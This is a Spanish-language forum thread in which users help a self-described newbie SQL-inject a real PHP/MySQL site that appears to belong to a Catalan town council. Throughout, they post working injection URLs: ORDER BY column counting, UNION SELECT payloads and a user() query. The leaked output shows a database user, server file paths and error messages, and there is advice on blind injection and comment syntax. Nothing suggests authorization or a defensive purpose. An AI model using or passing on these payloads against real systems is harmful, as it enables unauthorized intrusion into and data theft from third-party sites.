Salu2,
Tengo una página que he podido, por lo menos saber las columnas de su base de datos que tiene, está creada en php y core sobre Mysql:
http://www.lapaginaweb.com/index.php?contingut=2&codi=-1%20order%20by%205/*
Poniendo al final /* me deja ver que hay 5 porque si pongo 6 me peta.
El problema está seguir, he provado con:
-1+union+all+select 1,2,3,4,5/*
Y nada me da este error:
No s'ha pogut llegir select * from contingut where codi=-1 union all select 1,2,3,4,5/*
Alguien sabe como proseguir.... gracias para la ayuda a un newbaby!!!!!
talves porque necesita procesar un valor válido para poder mostrarse.
me da la impresión de que es blind sql o tendrás que ingeniartelas para fabricar una query tan fiel como la original y solo modificando un valor de una columna.
PD:
el código original no será este?
CitarNo s'ha pogut llegir select articles2.*, articles2_idioma.text as descr, articles2_idioma.text_curt as text_curt from articles2, articles2_idioma where codi= and id_idioma=2 and codi=id_article
Salu2, no se donde has sacado el codigo pero no es este intentare con blind sql, no se si me servirá......... si me puedes aportar algo mas me lo dices mil gracias
Bueno, por lo que he podido averiguar, ese sistema web que observas es un sistema CMS para shopping creado por
http://www.comunicatek.com/
y hay varias por internet.
yo mientras tanto pruebo acá y tu pruebas ayá.
Ese sitio web debe tener un buscador:
http://ejemplo.com/buscador.php?idioma=2 union select user(),2,3 --
u00061@localhost
con eso ya podrías inyectar libremente.
Lo raro que me fijé en este sistema es que cuando intentas obtener las columnas con order by siempre te retorna un numero mas elevado de columnas que el real, por ejemplo a mi me retornaba que habian 4 columnas pero eran solo 3 al igual que en la tabla de productos, también es resultado menos uno.
el resultado queda en el código fuente, no lo verás desde el explorador directamente.
Para eso haz view-source:htt://ejemplo... y buscas esto:
<option value='33'><option value='
ahi en ese valor te aparecerá tu inyección.
Saludos.
De donde has cacado el codigo????
googleando :P y viendo el código fuente, etc
No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc
mmmmmm
OK PROVANDO, y como dices tu es de esta gente si !!!
prueba con el buscador como te puse mas arriba
no tiene buscador............. buscando mas
mmmmmmm en el fichero rss.php?
http://www.*******.info/rss.php?noticies=2%20union%20select%20user%28%29,2,3%20--bisbal@localhost
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/usuaris/bisbal/php/categoria.php on line 127
Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/rss.php on line 27
Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/php/rss10.php on line 77
http://www.******.cat Les últimes notícies de l'Ajuntament http://www.******.cat/index.php?noticies=2&codi=376 PLE ORDINARI DEL 26 DE GENER DE 2010 http://www.********.cat/index.php?noticies=2&codi=374 PLE EXTRAORDINARI DEL DIA 21 DE GENER DE 2010 http://www.******.cat/index.php?noticies=2&codi=364 PLE ORDINARI DEL 27 DE GENER DE 2009 http://www.******.cat/index.php?noticies=2&codi=363 PLE ORDINARI DEL 30 DE JUNY DE 2009 http://www.*********.cat/index.php?noticies=2&codi=361 PLE ORDINARI DEL DIA 22 DE DESEMBRE DE 2009
jajajaja espero que no sea el bisbal que yo conozco o vas a terminar igual que t1z4k jajaja
JAJAJAJAJAJ no no lo es jejejejejejejeje mmmm no hay maneras buffff.....
home/usuaris/bisbal/templates_c/contingut.tpl
ese templates_c me recuerda a un post que está mas abajo, me da la impresion de que es el mismo sistema pero estoy inseguro
Smarty version 2.5.0 mmmmm
si tratas de hacer una query corrupta te escribe la query pero si la query no es corrupta pero aun así da error entonces sale mysql_error(), en ese caso se puede deducir que está utilizando mysqli o alguna función que verifica la query antes de ser procesada
Si eso me he fijado, estoy mirando el cms smarty 2.5.0 en google....
que post dices que es similar?????
Gracias
Usa mysqli el cms bufffff mas dificil !!!!
Cita de: nuevaorden en 22 Marzo 2010, 21:10 PM
No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc
mmmmmm
prueba a poner en vez de
/* -- porque parece que no se hace "el comentario" de la query siguiente
ya he provado antes y me da error siempre , mmmmmm es complejo este smarty